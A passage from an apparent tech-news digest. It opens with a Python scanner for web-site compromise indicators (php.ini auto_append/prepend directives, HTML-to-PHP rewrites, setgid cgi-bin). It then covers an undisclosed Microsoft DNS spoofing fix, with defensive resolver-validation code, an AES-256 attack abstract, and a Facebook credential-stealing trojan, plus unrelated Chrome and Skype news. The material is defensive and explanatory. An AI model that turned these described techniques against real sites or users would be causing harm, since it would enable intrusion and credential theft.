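# drwxrws--x as described in the post: directory, mode 771 with the set-gid bit
SAMPLE_CGI_BIN_MODE = stat.S_IFDIR | 0o2771

APPEND_RE = re.compile(r"""^\s*(auto_append_file|auto_prepend_file)\s*=\s*["']?([^"';\s]+)""", re.M)
# RewriteRule whose pattern ends in \.html or \.htm and whose substitution is a .php file
REWRITE_RE = re.compile(r"^\s*RewriteRule\s+(\S*\\\.html?\$?\S*)\s+(\S+\.php)\b", re.M | re.I)


def check_php_ini(text):
    """Return (directive, path) for every auto_append/prepend directive in a php.ini."""
    return [(directive, path) for directive, path in APPEND_RE.findall(text)]


def check_htaccess(text):
    """Return (pattern, target) for rewrites that send static .html/.htm pages to a PHP file."""
    return [(pattern, target) for pattern, target in REWRITE_RE.findall(text)]


def check_cgi_bin_mode(mode):
    """Report set-uid / set-gid bits on the cgi-bin directory (the post saw drwxrws--x)."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("setuid")
    if mode & stat.S_ISGID:
        bits.append("setgid")
    return bits


def scan_site(php_ini_text, htaccess_text, cgi_bin_mode):
    """Combine the three checks into a list of human-readable findings."""
    findings = []
    for directive, path in check_php_ini(php_ini_text):
        findings.append(f"php.ini: {directive} = {path}")
    for pattern, target in check_htaccess(htaccess_text):
        findings.append(f".htaccess: RewriteRule {pattern} -> {target}")
    for bit in check_cgi_bin_mode(cgi_bin_mode):
        findings.append(f"cgi-bin: {bit} bit set on directory")
    return findings


if __name__ == "__main__":
    for line in scan_site(SAMPLE_PHP_INI, SAMPLE_HTACCESS, SAMPLE_CGI_BIN_MODE):
        print(line)
```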
  19. You've never seen data presented like this. With the drama and urgency of a sportscaster, statistics guru Hans Rosling debunks myths about the so-called "developing world." Hans Rosling shows the best stats you've ever seen | Video on TED.com // I know the video is old, but it's worth watching; I only discovered it today.
  20. A recent security patch from Microsoft silently fixed two severe bugs that were never disclosed even though they posed a risk to many of its customers, a security researcher said. MS10-024 fixed two flaws that made it possible for adversaries to intercept victims' email messages sent by Exchange and Windows SMTP service, Nicolás Economou, a researcher with Core Security said. But the bugs - which made it "trivial" to spoof responses to domain name system queries - weren't disclosed and were never assigned a Common Vulnerabilities and Exposures identifier, sparking criticism that the critical bugs weren't properly disclosed. Instead, the Microsoft bulletin referred only to a denial of service vulnerability that was rated either "important" or "moderate." By underplaying the risk of the threats being fixed, MS10-024 didn't give IT admins adequate information in deciding when, or if, to install the patch, Core said. "These vulnerabilities were fixed by the patches referenced in MS10-024 but were not disclosed in the vendor's security bulletin and did not have a unique vulnerability identifier assigned to them," the Core advisory stated. "As a result, the guidance and the assessment of risk derived from reading the vendor's security bulletin may overlook or misrepresent actual threat scenarios." A Microsoft spokesman said researchers were investigating the report and would respond when their inquiry was completed. Core described the undisclosed vulnerabilities as "two severe bugs" residing in both Microsoft Exchange and the SMTP services included in the 2000, XP, 2003, and 2008 versions of Windows. They made it "trivial" for attackers to pull off DNS cache-poisoning attacks first described in the early 1990s and made famous two years ago by researcher Dan Kaminsky. One of the bugs causes vulnerable versions of Exchange and Windows to generate DNS queries using incremental transaction ID numbers.
That made it easy for malicious DNS servers to guess the values and send fraudulent responses. A second flaw failed to verify that the value of the ID field in a DNS response matched the corresponding DNS query packet previously sent. Machines that installed the patch, which was released last month, have been purged of both bugs, but users would have no way of knowing that from the bulletin that accompanied it. Indeed, the only hint of a fix comes in a FAQ section that said: "This update also includes a defense-in-depth change for Microsoft Exchange 2007 and Microsoft Exchange 2010 that adds additional source port entropy to DNS transactions initiated by the SMTP service." Core criticized that disclosure, saying source port entropy isn't the same thing as the value of the transaction ID field used in outbound DNS queries. It also said verification of ID responses is mandated by section 9.1 of RFC5452. "Core does not consider the two bugs reported to be 'security-in-depth' fixes and points out that there is an amount of literature to support that opinion starting with Core's first published security advisory on DNS query ID prediction and ending with Dan Kaminsky's over-publicized DNS poisoning technique which in 2008 Microsoft considered bona fide bugs that required public disclosure using their own CVEs as disclosed in MS08-037," it said. More information and commentary from the Breaking Code blog is here. Microsoft update secretly fixed two 'severe' bugs • The Register
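As an added example, not from the article or Core's advisory, a minimal stub-resolver fragment in Python showing the two checks at issue: drawing the DNS transaction ID from a CSPRNG instead of a counter, and refusing a reply whose ID and question section do not match an outstanding query (the RFC 5452 section 9.1 rule the article cites). Packets are constructed inline; nothing is sent on the network.

```python
import secrets
import struct


def encode_qname(name):
    """Wire-format a domain name: length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_query(name, txid=None):
    """Return (txid, packet) for an A/IN query. The ID comes from the CSPRNG, not a
    counter: a predictable ID is what let a spoofer pre-compute the reply (bug 1)."""
    if txid is None:
        txid = secrets.randbelow(1 << 16)
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, QDCOUNT=1
    return txid, header + encode_qname(name) + struct.pack("!HH", 1, 1)


def make_reply(txid, name, address):
    """Constructed reply (QR|RD|RA, one A record) used only to exercise the validator."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_qname(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in address.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, len(rdata)) + rdata
    return header + question + answer


def accept_response(pending, packet):
    """RFC 5452 s.9.1 style check: take a reply only if it is a response whose ID
    *and* question section match an outstanding query (bug 2 skipped the ID test)."""
    if len(packet) < 12:
        return False
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if not flags & 0x8000 or qdcount != 1:
        return False
    question = pending.get(txid)
    return question is not None and packet[12:12 + len(question)] == question


def resolve_flow(name):
    """Issue one query, then test a reply with the right ID and one whose ID is off
    by one, as a guessed reply would be. Returns (accepted_genuine, accepted_wrong_id)."""
    txid, packet = build_query(name)
    pending = {txid: packet[12:]}   # keyed by ID, like a resolver's outstanding table
    genuine = make_reply(txid, name, "192.0.2.1")
    wrong_id = make_reply((txid + 1) & 0xFFFF, name, "192.0.2.2")
    return accept_response(pending, genuine), accept_response(pending, wrong_id)
```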
  21. Cryptology ePrint Archive: Report 2010/257 Feasible Attack on the 13-round AES-256 Alex Biryukov and Dmitry Khovratovich Abstract: In this note we present the first attack with feasible complexity on the 13-round AES-256. The attack runs in the related-subkey scenario with four related keys, in 2^{76} time, data, and memory. Cryptology ePrint Archive: Report 2010/257
  22. Google claims the latest beta of its Chrome browser is a third faster than the previous release. The claimed improvement is based on V8 and SunSpider benchmarks. Other benefits include the ability to synchronise bookmarks and browser preferences on different machines via your Google account. Developers said they'd bowed to popular demand by allowing the installation and use of Chrome extensions in porn mode incognito mode. It also supports parts of HTML5 like Geolocation APIs and App Cache. There are versions of the beta to run on Mac, Linux or Windows machines. More from Google here Latest Chrome beta fastest ever - again • The Register
  23. When you use a computer other than your own, you have to be especially careful about what online accounts you access - particularly if the computer in question is in a library or an Internet cafe, where a lot of people can use it without raising suspicion and without having to give their personal information to do it. A recent episode that a Sunbelt researcher was the protagonist of demonstrates how easily your Facebook account credentials can be stolen. He was at his local library and noticed that one of the computers available for use had a flash drive sticking out of its ports. His curiosity aroused, he sat down and checked the contents of the drive and found an executable that sports an icon similar to the original Facebook logo and purports to be a "FaceBook Remote Viewer" that allows you to visit Facebook from school or work by avoiding firewalls. When executed, the user is faced with this screen: As the program loads, a website with a (grammatically flawed) description also loads in the background, as a way to defuse any skepticism that the user might have. The program eventually asks the user to enter his or her name, email and Facebook password, and seemingly proceeds with the log-in and loading process, but "fails" and shows the following screen: Of course, the firewall is not the problem - the program wasn't designed to allow you to access Facebook. It is an information-stealing Trojan that collects your credentials, which are now conveniently stored in a .txt file placed on the flash drive. The only thing left for the thief to do is to collect the drive and misuse the credentials. Demonstration of Facebook account credentials theft
  24. You have the edit button. Tidy up your post. What comments do you want? The program is old.
  25. (AP) -- Internet calling service Skype plans a public "beta" test of a group video chat function that lets up to five people participate in a video call simultaneously. When the feature launches next week it will be free, but Skype Ltd. plans to start charging for it along with some other upcoming features in three or four months, said Neil Stevens, general manager of Skype's consumer business segment. Skype's software already offers a range of free services, including the ability to make voice or video calls and send instant messages to other Skype users. Users pay for services such as making calls from a PC to a landline or cell phone. Stevens said group video chat will first be available to those who use Skype on Windows PCs, and the company expects to roll out a Mac version later this year. Stevens said the feature is the one users have requested most. Skype, which was sold late last year by eBay Inc. for about $2 billion to an investor group that includes Skype's founders, is also expanding its monthly subscription offerings to include calls to both cell phones and landlines in more than 170 countries. The company's existing subscription plans include one that allows calls to more than 40 countries, but they focus mostly on calls to landlines. That is generally cheaper for the company than routing calls from the Internet to cell phones. On Wednesday, Skype plans to unveil new subscriptions that let users choose which countries they want to call and whether they want to call landlines and cell phones or just one of the two. Skype to unveil group video chat function